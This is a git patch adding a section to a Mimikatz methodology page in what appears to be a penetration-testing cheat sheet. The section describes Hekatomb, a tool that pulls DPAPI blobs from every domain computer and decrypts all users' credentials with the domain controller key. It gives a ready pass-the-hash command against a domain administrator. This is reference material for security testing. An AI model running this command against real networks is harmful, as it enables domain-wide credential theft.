From 885f8bdb8f731c5f2ae3b0a72b3df0f08ac19f16 Mon Sep 17 00:00:00 2001 From: Processus Thief Date: Tue, 20 Sep 2022 16:56:07 +0200 Subject: [PATCH] Adding Hekatomb.py to DPAPI credentials stealing Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials. More infos here : https://github.com/Processus-Thief/HEKATOMB --- Methodology and Resources/Windows - Mimikatz.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 176fc6d..7ed1f55 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -14,6 +14,7 @@ * [Chrome Cookies & Credential](#chrome-cookies--credential) * [Task Scheduled credentials](#task-scheduled-credentials) * [Vault](#vault) +* [Hekatomb - Steal all credentials on domain](#hekatomb---Steal-all-credentials-on-domain) * [Mimikatz - Commands list](#mimikatz---commands-list) * [Mimikatz - Powershell version](#mimikatz---powershell-version) * [References](#references) @@ -235,6 +236,22 @@ Attributes : 0 vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\" ``` +### Hekatomb - Steal all credentials on domain + +> Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. + +> Then it will download all DPAPI blob of all users from all computers. + +> Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials. + +```python +python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp +``` + +https://github.com/Processus-Thief/HEKATOMB + +![Data in memory](https://docs.lestutosdeprocessus.fr/hekatomb.png) + ## Mimikatz - Commands list